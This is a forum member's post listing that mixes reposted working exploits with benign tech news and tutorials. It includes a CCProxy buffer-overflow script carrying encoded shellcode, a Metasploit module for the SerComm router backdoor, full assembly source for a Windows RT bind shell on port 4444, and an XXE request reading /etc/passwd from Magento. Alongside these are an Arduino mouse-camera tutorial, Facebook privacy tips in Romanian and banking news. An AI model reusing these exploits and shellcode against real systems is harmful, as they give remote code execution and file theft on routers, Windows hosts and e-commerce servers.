Jump to content

net3design

Active Members
  • Posts

    115
  • Joined

  • Last visited

  • Days Won

    2

Everything posted by net3design

  1. #### # Exploit Title: CCProxy v7.3 Integer Overflow Exploit # Date: 2013/03/22 # Author: Mr.XHat # E-Mail: Mr.XHat {AT} GMail.com # Vendor Homepage: Proxy Software for Windows 7/2008/Vista/XP/2003 - Youngzsoft CCProxy # Software Link: http://user.youngzsoft.com/ccproxy/update/ccproxysetup.exe # Version: Prior To 7.3 # Discovered By: Mr.XHat # Tested On: WinXP SP3 EN #### hdr = "[System]" hdr += "\x0d\x0a" hdr += "Ver=7.3" hdr += "\x0d\x0a" hdr += "Language=" # EAX: 0x41414131 buf = "\x41" * 1028 gdt1 = "\x04\xB4\x12\x00" pad1 = "\x41" * 4 gdt2 = "\xF4\xB3\x12\x00" pad2 = "\x41" * 12 gdt3 = "\x04\xB4\x12\x00" sc = ( # Avoid: '\x00\xff\xf5' "\x6a\x32\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xba" + "\xb3\x5c\xb6\x83\xeb\xfc\xe2\xf4\x46\x5b\xd5\xb6\xba\xb3" + "\x3c\x3f\x5f\x82\x8e\xd2\x31\xe1\x6c\x3d\xe8\xbf\xd7\xe4" + "\xae\x38\x2e\x9e\xb5\x04\x16\x90\x8b\x4c\x6d\x76\x16\x8f" + "\x3d\xca\xb8\x9f\x7c\x77\x75\xbe\x5d\x71\x58\x43\x0e\xe1" + "\x31\xe1\x4c\x3d\xf8\x8f\x5d\x66\x31\xf3\x24\x33\x7a\xc7" + "\x16\xb7\x6a\xe3\xd7\xfe\xa2\x38\x04\x96\xbb\x60\xbf\x8a" + "\xf3\x38\x68\x3d\xbb\x65\x6d\x49\x8b\x73\xf0\x77\x75\xbe" + "\x5d\x71\x82\x53\x29\x42\xb9\xce\xa4\x8d\xc7\x97\x29\x54" + "\xe2\x38\x04\x92\xbb\x60\x3a\x3d\xb6\xf8\xd7\xee\xa6\xb2" + "\x8f\x3d\xbe\x38\x5d\x66\x33\xf7\x78\x92\xe1\xe8\x3d\xef" + "\xe0\xe2\xa3\x56\xe2\xec\x06\x3d\xa8\x58\xda\xeb\xd0\xb2" + "\xd1\x33\x03\xb3\x5c\xb6\xea\xdb\x6d\x3d\xd5\x34\xa3\x63" + "\x01\x43\xe9\x14\xec\xdb\xfa\x23\x07\x2e\xa3\x63\x86\xb5" + "\x20\xbc\x3a\x48\xbc\xc3\xbf\x08\x1b\xa5\xc8\xdc\x36\xb6" + "\xe9\x4c\x89\xd5\xdb\xdf\x3f\x98\xdf\xcb\x39\xb6" ) exp = hdr+buf+gdt1+pad1+gdt2+pad2+gdt3+sc file = open("CCProxy.ini", "w") file.write(exp) file.close() Source : Exploit DB
  2. ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::CmdStagerEcho def initialize(info={}) super(update_info(info, 'Name' => "SerComm Device Remote Code Execution", 'Description' => %q{ This module will cause remote code execution on several SerComm devices. These devices typically include routers from NetGear and Linksys. Tested against NetGear DG834. }, 'License' => MSF_LICENSE, 'Author' => [ 'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc 'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module ], 'Payload' => { 'Space' => 10000, # Could be more, but this should be good enough 'DisableNops' => true }, 'Platform' => 'linux', 'Privileged' => false, 'Targets' => [ ['Linux MIPS Big Endian', { 'Arch' => ARCH_MIPSBE } ], ['Linux MIPS Little Endian', { 'Arch' => ARCH_MIPSLE } ], ], 'DefaultTarget' => 0, 'References' => [ [ 'OSVDB', '101653' ], [ 'URL', 'https://github.com/elvanderb/TCP-32764' ] ], 'DisclosureDate' => "Dec 31 2013" )) register_options( [ Opt::RPORT(32764) ], self.class) end def check fprint = endian_fingerprint case fprint when 'BE' print_status("Detected Big Endian") return Msf::Exploit::CheckCode::Vulnerable when 'LE' print_status("Detected Little Endian") return Msf::Exploit::CheckCode::Vulnerable end return Msf::Exploit::CheckCode::Unknown end def exploit execute_cmdstager(:noargs => true) end def endian_fingerprint begin connect sock.put(rand_text(5)) res = sock.get_once disconnect if res && res.start_with?("MMcS") return 'BE' elsif res && res.start_with?("ScMM") return 'LE' end rescue Rex::ConnectionError => e print_error("Connection failed: #{e.class}: #{e}") end return nil end def execute_command(cmd, opts) vprint_debug(cmd) # Get the length of the command, for the backdoor's command injection cmd_length = cmd.length # 0x53634d4d => Backdoor code # 0x07 => Exec command # cmd_length => Length of command to execute, sent after communication struct data = [0x53634d4d, 0x07, cmd_length].pack("VVV") connect # Send command structure followed by command text sock.put(data+cmd) disconnect Rex.sleep(1) end end Source: Exploit-DB Rapid7
  3. Optical mouse uses a small camera that records surface to calculate movements of the mouse. In this tutorial I will show you how to display video signal of this camera in your browser. The mouse I took apart was an old Logitech RX 250 which contains ADNS-5020 optical sensor. This sensor records 15x15 pixel images in grayscale. It also calculates X-Y movements of the mouse. To get the things running you will need: - arduino - ethernet shield - optical mouse with ADNS-5020 sensor - 10K ohm resistor Connect everything together Make sure that pins (NRESET, NCS, DSIO, SCLK) of the sensor don't connect to anything on the mouse board. If they do, cut the traces. (I removed the main chip and some resistors to achieve the same thing.) Solder 10K ohm resistor between NRESET and +5V. Then solder wires (approx. 20cm) to pins NCS, DSIO, SCLK, +5V, GND. This is a scheme that you should end with: Put Ethernet shield on arduino and connect it to local network. Then connect mouse sensor to arduino like this: +5V -------------- Arduino +5V GND -------------- Arduino GND NCS -------------- Arduino digital pin 7 SDIO -------------- Arduino digital pin 6 SCLK -------------- Arduino digital pin 5 Arduino sketch In the sketch below replace receiverIP value (in my case 192, 168, 1, 102) to IP of your computer. Then upload the sketch to arduino. #include <SPI.h> #include <Ethernet.h> #include <EthernetUdp.h> byte arduinoMac[] = { 0xDE, 0xAD, 0xBE, 0xEF, 0xFE, 0xED }; IPAddress arduinoIP(192, 168, 1, 177); // desired IP for Arduino unsigned int arduinoPort = 8888; // port of Arduino IPAddress receiverIP(192, 168, 1, 102); // IP of udp packets receiver unsigned int receiverPort = 6000; // port to listen on my PC EthernetUDP Udp; int SCLK = 5; int SDIO = 6; int NCS = 7; void setup() { Serial.begin(9600); Ethernet.begin(arduinoMac,arduinoIP); Udp.begin(arduinoPort); pinMode(SCLK, OUTPUT); pinMode(SDIO, OUTPUT); pinMode(NCS, OUTPUT); mouse_reset(); delay(10); } void loop() { char img[225]; for (int i=0;i<225;i++){ img[i]=readLoc(0x0b); img[i] &= 0x7F; img[i]+=1;//if there is 0 value, part of udp package is lost Serial.print(img[i], DEC); Serial.print(","); delay(2); } Serial.println(); Udp.beginPacket(receiverIP, receiverPort); //start udp packet Udp.write(img); //write mouse data to udp packet Udp.endPacket(); // end packet delay(500); } void mouse_reset(){ // Initiate chip reset digitalWrite(NCS, LOW); pushbyte(0x3a); pushbyte(0x5a); digitalWrite(NCS, HIGH); delay(10); // Set 1000cpi resolution digitalWrite(NCS, LOW); pushbyte(0x0d); pushbyte(0x01); digitalWrite(NCS, HIGH); } unsigned int readLoc(uint8_t addr){ unsigned int ret=0; digitalWrite(NCS, LOW); pushbyte(addr); ret=pullbyte(); digitalWrite(NCS, HIGH); return(ret); } void pushbyte(uint8_t c){ pinMode(SDIO, OUTPUT); for(unsigned int i=0x80;i;i=i>>1){ digitalWrite(SCLK, LOW); digitalWrite(SDIO, c & i); digitalWrite(SCLK, HIGH); } } unsigned int pullbyte(){ unsigned int ret=0; pinMode(SDIO, INPUT); for(unsigned int i=0x80; i>0; i>>=1) { digitalWrite(SCLK, LOW); ret |= i*digitalRead(SDIO); digitalWrite(SCLK, HIGH); } pinMode(SDIO, OUTPUT); return(ret); } Open serial window and you should see data flow from mouse: Arduino sketch In the sketch below replace receiverIP value (in my case 192, 168, 1, 102) to IP of your computer. Then upload the sketch to arduino. Install Node.js and Socket.IO To display data in browser we need to have node.js and socket.io installed on computer. Install node.js from here: nodejs.org then go to windows command prompt and run: npm install socket.io Node.js and and website code In the code below we configure node.js to listen to udp traffic from arduino, send all data to browser with socket.io and setup a basic web server. var dgram = require("dgram"); var server = dgram.createSocket("udp4"); var io = require('socket.io').listen(8000); // server listens for socket.io communication at port 8000 io.set('log level', 1); // disables debugging. this is optional. you may remove it if desired. server.on("message", function (msg, rinfo) { //every time new data arrives do this: //console.log("server got: " + msg + " from " + rinfo.address + ":" + rinfo.port); //console.log("server got:" + msg); io.sockets.emit('message', msg); }); server.on("listening", function () { var address = server.address(); console.log("server listening " + address.address + ":" + address.port); }); server.bind(6000); //listen to udp traffic on port 6000 var http = require("http"), url = require("url"), path = require("path"), fs = require("fs") port = process.argv[2] || 8888; http.createServer(function(request, response) { var uri = url.parse(request.url).pathname , filename = path.join(process.cwd(), uri); var contentTypesByExtension = { '.html': "text/html", '.css': "text/css", '.js': "text/javascript" }; fs.exists(filename, function(exists) { if(!exists) { response.writeHead(404, {"Content-Type": "text/plain"}); response.write("404 Not Found\n"); response.end(); return; } if (fs.statSync(filename).isDirectory()) filename += '/index.html'; fs.readFile(filename, "binary", function(err, file) { var headers = {}; var contentType = contentTypesByExtension[path.extname(filename)]; if (contentType) headers["Content-Type"] = contentType; response.writeHead(200, headers); response.write(file, "binary"); response.end(); }); }); }).listen(parseInt(port, 10)); console.log("Static file server running at\n => http://localhost:" + port + "/\nCTRL + C to shutdown"); Just save the code as: code.js Now we need to create a website which will convert data from socket.io into 15x15 image. This is it: <html> <head> <style> #wrapper { width:300px; height:300px; } div div { width:20px; height:20px; float:left; } </style> <script type="text/javascript" src="//localhost:8000/socket.io/socket.io.js"></script> <script> var socket = io.connect('http://localhost:8000'); socket.on('connect', function () { socket.on('message', function (msg) { document.getElementById('wrapper').innerHTML = ''; for (var i = 0; i < 225; i++) { pixDraw(Math.round((msg[i])*2.4)); } }); }); function pixDraw(clr) { var pixDiv = document.createElement('div'); pixDiv.style.backgroundColor = "rgb("+clr+","+clr+","+clr+")"; document.getElementById("wrapper").appendChild(pixDiv); } </script> </head> <body> <div id="wrapper"></div> </body> </html> Save it as index.html Run it! If you are on windows then just download zip file below and run the runme.bat file. If you are on linux then run the command node code.js in the shell. Now open the address http://localhost:8888/ in a web browser and you should see a realtime image from mouse: Source : Hack a Mouse
  4. Cum sa blochezi etichetarea in poze sau postari pe Facebook. Controleaza cine si cand te eticheteaza Nu este deloc placut sa fii etichetat oricand si de catre oricine in poze sau postari. Daca asta se intampla in cazul unui spam\virus de acest tip, atunci lucrurile sunt si mai neplacute. Multi nu stiu ca pot controla cine si cand ii eticheteaza pe Facebook si pot evalua si aproba dupa caz aceste “tag-uri” inainte ca ele sa apara pe profilul lor. Iata cum se procedeaza. Accesezi sectiunea “Privacy settings” din setarile contului tau si apoi “Timeline and Tagging Settings“. Poti accesa direct: https://www.facebook.com/settings?tab=timeline. Aici ai de facut doua modificari: 1. Apesi butonul “Edit” din dreptul “Review posts friends tag you in before they appear on your timeline?” si selectezi “Enabled“. 2. Apesi butonul “Edit” din dreptul “Review tags people add to your own posts before the tags appear on Facebook?” si alegi “Enabled“. Sursa : Faravirusi.com
  5. VIDEO ING Bank vrea s? te fac? s? renun?i la carduri ?i s?-?i ?ii banii pe smartphone ING Bank a lansat, mar?i, ING Pay, solu?ie de plat? cu ajutorul smartphone-ului ?i al tehnologiei Visa contactless, care permite efectuarea de pl??i rapide la POS. Lansarea noului serviciu se înscrie în orientarea strategic? a ING Bank c?tre mediul digitial ?i este în linie cu cre?terea accelerat? a adop?iei ?i utiliz?rii smartphone-urilor în România. Solu?ia ING Pay este compus? dintr-o aplica?ie nativ? disponibil? în GooglePlay sau AppStore ?i un card microSD, ce incorporeaz? tehnologia NFC, operat de VISA. Un dezavantaj al acestui nou sistem de plat? este faptul c? utilizatorul va fi nevoit s? reunun?e la spa?iul suplimentar de stocare oferit de cardurile microSD obi?nuite. În cazul utilizatorilor de iPhone, smartphone care nu dispune de slot pentru card microSD, sistemul include o hus? special? care se conecteaz? la telefon. ING Pay poate fi personalizat în func?ie de preferin?ele fiec?rui utilizator ?i înlocuie?te numerarul sau cardul la comercian?i, permi?ând efectuarea de pl??i rapide, în doar câteva secunde. Pentru rapiditate, utilizatorii pot alege s? introduc? PIN-ul doar pentru pl??i mai mari de 100 RON, situa?ie în care tranzac?ia se finalizeaz? tot contactless. Aplica?ia ofer? ?i op?iunea de folosire a codului PIN, pentru toate tranzac?iile, indiferent de valoarea lor. „Prin lansarea serviciului ING Pay ?i a cardurilor contactless, ING face înc? un pas spre viitor, oferind clien?ilor s?i solu?ii de plat? inovatoare ?i u?or de utilizat. Odat? cu ING Pay, orientarea ING c?tre serviciile din zona e-banking trece de bariera internetului pe PC/laptop/tablet? ?i se îndreapt? c?tre pia?a de mobile, o pia?? aflat? pe un trend ascendent în ultimii ani.” a declarat Maria Cristina Matei, Head of ING Retail Banking. Pl??ile contactless cu telefonul pot fi efectuate în ?ar? ?i în str?in?tate, oriunde apare logo-ul VISA PayWave la casa de marcat (supermarket-uri, benzin?rii, restaurante, cinematografe, farmacii etc). ING Pay este disponibil pentru urm?toarele telefoane (dotate cu conexiune la internet): iPhone 4, iPhone 4S, Samsung Galaxy S (I9000), Samsung Galaxy S Plus (I9001), Samsung Galaxy S II (I9100), Samsung Galaxy S II Plus (I9105), Samsung Galaxy S III (I9300), Samsung Galaxy S4 (I9505), Samsung Galaxy Note II (N7100). Reprezentan?ii ING sus?in c?, în principiu, sistemul ar fi compatibil ?i cu alte smartphone-uri cu Android, cu condi?ia ca acestea s? dispun? de slot pentru card microSD. ING Pay s-a lansat ca urmare a colabor?rii dintre ING Bank, VISA Europe ?i Oberthur Technologies Romania. Acest nou serviciu continu? seria nout??ilor ING Bank în materie de pl??i. În prima jum?tate a anului 2013, ING Bank a lansat cardurile contactless Visa ?i Mastercard care, pe lâng? func?ionalit??ile obi?nuite ale unui card de debit, permit efectuarea de pl??i doar prin trecerea prin fa?a terminalului POS contactless. Astfel, pl??ile contactless scurteaz? timpul de a?teptare ?i cresc viteza de efectuare a tranzac?iilor la comercian?i. Pentru a întelege cum cheltuim, economisim, investim ?i cât de rapid ne adapt?m noilor tendin?e - precum serviciile de mobile banking, ING Bank a publicat rezultatele ultimului studiu IIS - „Financial Empowerement in the Digital Age”, care ofer? informa?ii relevante privind pia?a de mobile banking, tehnologia contactless ?i felul în care utilizatorii se raporteaz? la modalit??ile de plat? online. Conform studiului, 37% dintre europeni folosesc mobile banking ?i î?i controleaz? banii din mers iar 62% dintre ace?tia î?i pl?tesc mai des facturile la timp datorit? acestui serviciu. Dintre ??rile europene, Olanda este ?ara cu cel mai mare num?r de utilizatori de mobile banking. Turcia este viitorul hotspot pentru aceste servicii iar polonezii sunt cei care folosesc cel mai des serviciul de mobile banking pentru cump?r?turi. Exist? mai multe motive pentru care unii dintre europeni nu apeleaz? înc? la mobile banking: lipsa unui smartphone sau a unei tablete (37%), temerile legate de securitatea acestor solu?ii (33%) sau convingerea ca serviciile de mobile banking nu le ofer? ceva ce nu pot ob?ine prin metode tradi?ionale de interac?iune cu banca (11%). În ceea ce prive?te rezultatele pentru România, peste 32% dintre utilizatorii români de internet intervieva?i au r?spuns c? folosesc serviciile de mobile banking, ceea ce înseamn? c? adop?ia acestui serviciu în România e apropiat? de ??ri precum Fran?a (25%) sau Belgia (26%). Sursa : Adevarul IT news
  6. ; Title: Windows RT ARM Bind Shell (Port 4444) ; Date: July 28, 2013 ; Author: Matthew Graeber (@mattifestation) ; Blog post: Exploit Monday: Windows RT ARMv7-based Shellcode Development ; Tested on: Microsoft Surface RT Tablet w/ Windows RT (6.2.9200) ; License: BSD 3-Clause ; Syntax: MASM ; Notes: In order for this to work properly, you have to call this payload ; at baseaddress + 1 since it is thumb code. ; This was built with armasm.exe from Visual Studio 2012 AREA |.foo|, CODE, THUMB ; After linking, the resulting executable will only ; have a single section (with RX permissions) named .foo EXPORT main main push {r4,lr} ; Preserve registers on the stack bl ExecutePayload ; Execute bind shell function pop {r4,pc} ; Restore registers on the stack and return to caller GetProcAddress ; ARM (Thumb) implementation of the logic from the Metasploit x86 block_api shellcode push {r1-r11,lr} ; Preserve registers on the stack mov r9,r0 ; Save the function hash in R9 mrc p15,#0,r3,c13,c0,#2 ; R3 = &TEB ldr r3,[r3,#0x30] ; R3 = &PEB ldr r3,[r3,#0xC] ; R3 = PEB->Ldr movs r6,#0 ; R6 = 0 ldr r1,[r3,#0xC] ; R1 = Ldr->InLoadOrderModuleList ldr r4,[r1,#0x18] ; R4 = LDR_DATA_TABLE_ENTRY.DllBase ldr r3,[r1,#0x2C] ; R3 = LDR_DATA_TABLE_ENTRY.BaseDllName ldr r7,[r1,#0x30] ; R7 = LDR_DATA_TABLE_ENTRY.BaseDllName.Buffer str r3,[sp] ; Store BaseDllName.Length/MaximumLength on the stack cbz r4,exit_failure ; If DllBase == 0, you've likely reached the end of the module list. Return 0. mov r10,#0xD ; R10 = ROR value (13) mov r11,#0xD ; R11 = ROR value (13) get_module_hash ; Improvement: Need to validate MaximumLength != 0 ldrh r5,[sp,#2] ; BaseDllName.MaximumLength movs r2,#0 ; i = 0 cbz r5,get_export_dir ; Reached the last char of BaseDllName ror_module_char ldrsb r3,[r7,r2] ; R3 = (CHAR) *((PCSTR) BaseDllName.Buffer + i) rors r0,r6,r10 ; Calculate the next portion of the module hash cmp r3,#0x61 ; Is the character lower case? blt notlowercase adds r3,r3,r0 ; Add to the running hash value subs r6,r3,#0x20 ; Convert character to upper case b get_next_char notlowercase adds r6,r3,r0 ; Add to the running hash value get_next_char adds r2,#1 ; Move to the next character cmp r2,r5 ; Reached the last character in the module name? bcc ror_module_char ; If not, move on to the next character get_export_dir ; At this point, the module hash has been calculated. ; Now begin calculating the function hash ldr r3,[r4,#0x3C] ; IMAGE_DOS_HEADER.e_lfanew - i.e. offset to PE IMAGE_NT_HEADERS adds r3,r3,r4 ; PIMAGE_NT_HEADERS ldr r3,[r3,#0x78] ; IMAGE_DIRECTORY_ENTRY_EXPORT.VirtualAddress (only an RVA at this point) cbz r3,get_next_module ; Move to the next module if it doesn't have an export directory (i.e. most exe files) adds r5,r3,r4 ; Calculate export dir virtual address ldr r3,[r5,#0x20] ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfNames ldr r7,[r5,#0x18] ; R7 = PIMAGE_EXPORT_DIRECTORY->NumberOfNames movs r0,#0 adds r8,r3,r4 ; AddressOfNames VA cbz r7,get_next_module ; Move on to the next module if there are no exported names calc_func_hash ldr r3,[r8],#4 ; R3 = Current name RVA movs r2,#0 adds lr,r3,r4 ; lr = Current name VA get_func_char ldrsb r3,[lr] ; Load char from the function name rors r2,r2,r11 ; Calculate the next portion of the function hash adds r2,r2,r3 ; Add to the running hash value ldrsb r3,[lr],#1 ; Peek at the next char cmp r3,#0 ; Are you at the end of the function string? bne get_func_char ; If not, calculate hash for the next char. adds r3,r2,r6 ; Add the module hash to the function hash cmp r3,r9 ; Does the calulated hash match the hash provided? beq get_func_addr adds r0,#1 cmp r0,r7 ; Are there more functions to process? bcc calc_func_hash get_next_module ldr r1,[r1] ; LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink movs r6,#0 ; Clear the function hash ; Improvement: The following portion is redundant ldr r4,[r1,#0x18] ; R4 = LDR_DATA_TABLE_ENTRY.DllBase ldr r3,[r1,#0x2C] ; R3 = LDR_DATA_TABLE_ENTRY.BaseDllName ldr r7,[r1,#0x30] ; R7 = LDR_DATA_TABLE_ENTRY.BaseDllName.Buffer cmp r4,#0 ; DllBase == 0? str r3,[sp] ; Store BaseDllName.Length/MaximumLength on the stack bne get_module_hash exit_failure movs r0,#0 ; Return 0 upon failure to find a matching hash exit_success pop {r1-r11,pc} ; Restore stack and return to caller with the function address in R0 get_func_addr ldr r3,[r5,#0x24] ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals add r3,r3,r0,lsl #1 ldrh r2,[r3,r4] ; R2 = Ordinal table index ldr r3,[r5,#0x1C] ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfFunctions add r3,r3,r2,lsl #2 ldr r3,[r3,r4] ; Function RVA adds r0,r3,r4 ; R0 = Function VA b exit_success ExecutePayload ; Improvement: None of the calls to GetProcAddress ; validate that a valid address was actually returned ; Metasploit shellcode doesn't perform this validation either. push {r4-r11,lr} ; Preserve registers on the stack subw sp,sp,#0x214 ; Allocate soace on the stack for local variables movs r3,#0x44 ; sizeof(_PROCESS_INFORMATION) add r2,sp,#0x38 ; R2 = &StartupInfo movs r1,#0 init_mem1 ; Improvement: I could just initialize everything on the stack to 0 strb r1,[r2],#1 ; Set current byte to 0 subs r3,#1 bne init_mem1 movs r3,#0x10 ; sizeof(_STARTUPINFOW) add r2,sp,#0x28 ; R2 = &ProcessInformation init_mem2 strb r1,[r2],#1 ; Set current byte to 0 subs r3,#1 bne init_mem2 ldr r0,HASH_LoadLibraryA bl GetProcAddress mov r3,r0 adr r0,module_name ; &"ws2_32.dll" blx r3 ; LoadLibrary("ws2_32.dll"); ldr r0,HASH_WsaStartup bl GetProcAddress mov r4,r0 ldr r0,HASH_WsaSocketA bl GetProcAddress mov r5,r0 ldr r0,HASH_Bind bl GetProcAddress mov r6,r0 ldr r0,HASH_Listen bl GetProcAddress mov r7,r0 ldr r0,HASH_Accept bl GetProcAddress mov r8,r0 ldr r0,HASH_CloseSocket bl GetProcAddress mov r9,r0 ldr r0,HASH_CreateProcess bl GetProcAddress mov r10,r0 ldr r0,HASH_WaitForSingleObject bl GetProcAddress mov r11,r0 mov r0,#0x0202 add r1,sp,#0x80 blx r4 ; WSAStartup(MAKEWORD(2, 2), &WSAData); movs r3,#0 movs r2,#0 movs r1,#1 movs r0,#2 str r3,[sp,#4] str r3,[sp] blx r5 ; s = WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 ); movs r3,#2 ; service.sin_family = AF_INET; strh r3,[sp,#0x18] movs r3,#0 ; service.sin_addr.s_addr = 0; str r3,[sp,#0x1C] mov r3,#0x5C11 ; service.sin_port = HTONS(4444); movs r2,#0x10 add r1,sp,#0x18 strh r3,[sp,#0x1A] mov r5,r0 ; WSASocketA returned socket (s) blx r6 ; Bind( s, (SOCKADDR *) &service, sizeof(service) ); movs r1,#0 mov r0,r5 blx r7 ; Listen( s, 0 ); movs r2,#0 movs r1,#0 mov r0,r5 blx r8 ; AcceptedSocket = Accept( s, 0, 0 ); mov r4,r0 mov r0,r5 blx r9 ; CloseSocket( s ); Close the original socket mov r3,#0x101 ; StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; str r3,[sp,#0x64] movs r3,#0x44 ; StartupInfo.cb = 68; str r3,[sp,#0x38] add r3,sp,#0x28 str r3,[sp,#0x14] add r3,sp,#0x38 str r3,[sp,#0x10] movs r3,#0 str r3,[sp,#0xC] str r3,[sp,#8] str r3,[sp,#4] movs r3,#1 adr r1,cmdline ; &"cmd" str r3,[sp] movs r3,#0 movs r2,#0 movs r0,#0 str r4,[sp,#0x78] ; StartupInfo.hStdError = (HANDLE) AcceptedSocket; str r4,[sp,#0x74] ; StartupInfo.hStdOutput = (HANDLE) AcceptedSocket; str r4,[sp,#0x70] ; StartupInfo.hStdInput = (HANDLE) AcceptedSocket; blx r10 ; CreateProcessA( 0, "cmd", 0, 0, TRUE, 0, 0, 0, &StartupInfo, &ProcessInformation ); ldr r0,[sp,#0x28] mvn r1,#0 blx r11 ; WaitForSingleObject( ProcessInformation.hProcess, INFINITE ); addw sp,sp,#0x214 pop {r4-r11,pc} HASH_WaitForSingleObject DCD 0x601d8708 HASH_CreateProcess DCD 0x863fcc79 HASH_CloseSocket DCD 0x614d6e75 HASH_Accept DCD 0xe13bec74 HASH_Listen DCD 0xff38e9b7 HASH_Bind DCD 0x6737dbc2 HASH_WsaSocketA DCD 0xe0df0fea HASH_WsaStartup DCD 0x006b8029 HASH_LoadLibraryA DCD 0x0726774c cmdline DCB "cmd", 0x0 module_name DCB "ws2_32.dll", 0x0 END Source : Exploit DB 27180 Windows RT
  7. Ai fost destul de bun cu membrii forum-ului. Iti multumim pt conturi ...
  8. Contul de Facebook, public sau privat, defineste posesorul pe plan profesional, personal si social, iar protejarea identitatii si confidentialitatii ar trebui s? fie una dintre cele mai importante prioritati. Totu?i, pu?in? lume ia m?suri pentru a securiza contul. Cu apari?ia Facebook Mobile, putem avea Facebook oriunde, îns? am devenit ?i mai vulnerabili la spargerile de cont sau furtul de identitate. Mashable a alc?tuit o list? cu cinci lucruri care pot fi f?cute pentru a cre?te protec?ia telefoanelor ?i a conturilor pe re?elele de socializare. 1. Pune o parol? Peste 30% dintre utilizatorii de smartphone-uri nu î?i protejeaz? telefoanele cu o parol? sau un tipar. Aceasta ar trebui s? fie prima linie de ap?rare în cazul în care telefonul este pierdut sau furat. Dac? ave?i un iPhone care deja are parol?, dar dori?i una mai complicat?, pute?i intra în General Settings, Passcode Lock, unde opri?i op?iunea Simple Passcode, care limiteaz? parola la 4 cifre, permi?ând utilizarea unui cod mai lung. De asemenea, unele telefoane au op?iunea de a ?terge datele stocate dup? un num?r de tentative e?uate de a introduce parola. 2. Folosi?i o parol? diferit? pentru email ?i contul de Facebook Trei sferturi dintre utilizatori folosesc o singur? parol? pentru toate conturile. Câteva cifre sau litere în plus la o parol? pot cre?te drastic timpul necesar pentru a sparge codul. 3. Asigura?i-v? c? Secure Browsing ( C?utarea Securizat?) este activat?. Începând din 2011, Facebook a oferit o op?iune de c?utare securizat?. F?r? o conexiune HTTP securizat?, informa?iile sunt vulnerabile atacurilor de fiecare dat? când folosi?i Wi-Fi gratis, precum cel oferit la Starbucks sau alte fast-food-uri. 4. Permite notific?rile de autentificare ?i aprob?rile Pentru a te asigura de folosirea contului de Facebook când ?i unde dore?ti, activeaz? aceast? op?iune ?i Facebook va trimite notific?ri de fiecare dat? când contul t?u este accesat dintr-o nou? loca?ie (va trebui s? oferi un num?r de telefon pentru a fi trimise mesaje text de notificare). Dac? cineva î?i sparge contul, ve?i primi instruc?iuni pentru resetarea parolei ?i securizarea contului. Aprob?rile pentru autentificare vor cere un cod special de fiecare dat? când accesezi contul de pe un dispozitiv nou. 5. Folose?te “Contacte de încredere” (Trusted Contacts) Inova?ia recent? de la Facebook î?i cere s? selectezi un grup restrâns de prieteni de încredere. În eventualitatea în care nu po?i s? accesezi contul ?i nici întreb?rile de securitate nu ajut?, Facebook va trimite coduri diferite acelor prieteni. Prin punerea împreun? a codurilor, ve?i putea s? va autentifica?i pe Facebook. Sursa : Cinci ponturi pentru a spori securitatea telefonului ?i a contului de Facebook | Ziarul Financiar
  9. Restrictionarea activarii unei aplicatii de tip third-party protejeaza securitatea computerelor si creste eficienta angajatilor. Insa, 57% dintre companii inca nu utilizeaza instrumente pentru controlul aplicatiilor, potrivit unui studiu realizat de Kaspersky Lab, in parteneriat cu B2B International in luna noiembrie 2012. Infractorii cibernetici folosesc numeroase trucuri pentru a infecta sistemele IT. Un astfel de exemplu este trimiterea fisierelor malware pe post de aplicatii populare, astfel incat atunci cand un angajat incearca sa porneasca o aplicatie, intreaga infrastructura este compromisa. Pentru a preveni astfel de incidente, companiile trebuie sa dezvolte si sa aplice politici de securitate legate de instalarea si de pornirea aplicatiilor, insa nu toate procedeaza astfel. Potrivit studiului, majoritatea companiilor nu controleaza in niciun fel aplicatiile descarcate, iar 17% dintre firme nu planuiesc sa utilizeze noi tehnologii pentru controlul aplicatiilor sau nici macar nu sunt constiente de existenta acestora. Situatia este asemanatoare si in ceea ce priveste utilizarea dispozitivelor externe si a altor suporturi de date: doar 44% dintre companii acorda suficienta atentie acestei probleme si implementeaza instrumente pentru controlul dispozitivelor, pe cand 17% din companii nu sunt constiente de existenta instrumentelor pentru controlul dispozitivelor sau nu sunt interesate sa le utilizeze. Sursa : Circa 60% dintre companii nu controleaza aplicatiile utilizate de catre angajati
  10. SEC Consult Vulnerability Lab Security Advisory < 20120712-0 > ======================================================================= title: Local file disclosure via XXE injection product: Magento eCommerce Platform Enterprise & Community Edition vulnerable version: Magento eCommerce Platform Enterprise Edition <= v1.12.0.1 Magento eCommerce Platform Community Edition <= v1.7.0.1 fixed version: Magento eCommerce Platform Enterprise Edition <= v1.12.0.2 Magento eCommerce Platform Community Edition <= v1.7.0.2 impact: Critical homepage: Ecommerce Software & Ecommerce Platform Solutions | Magento found: 2012-06-18 by: K. Gudinavicius SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Magento eCommerce Platforms provide the scalability, flexibility and features for business growth. Magento provides feature-rich eCommerce platforms that offer merchants complete flexibility and control over the presentation, content, and functionality of their online channel." Source: Online Shopping Cart Software | Magento Vulnerability overview/description: ----------------------------------- Magento eCommerce platform uses a vulnerable version of Zend framework which is prone to XML eXternal Entity Injection attacks. The SimpleXMLElement class of Zend framework (SimpleXML PHP extension) is used in an insecure way to parse XML data. External entities can be specified by adding a specific DOCTYPE element to XML-RPC requests. By exploiting this vulnerability an application may be coerced to open arbitrary files and/or TCP connections. Proof of concept: ----------------- Magento uses a vulnerable Zend_XmlRpc_Server() class (Zend\XmlRpc\Server.php) to handle XML-RPC requests. Hence it is possible to disclose arbitrary local files from the remote system. The following HTTP POST request to the vulnerable XmlRpc server application illustrates the exploitation of this vulnerability: POST /index.php/api/xmlrpc HTTP/1.1 Host: $host <?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT methodName ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <methodCall> <methodName>&xxe;</methodName> </methodCall> Vulnerable / tested versions: ----------------------------- Magento 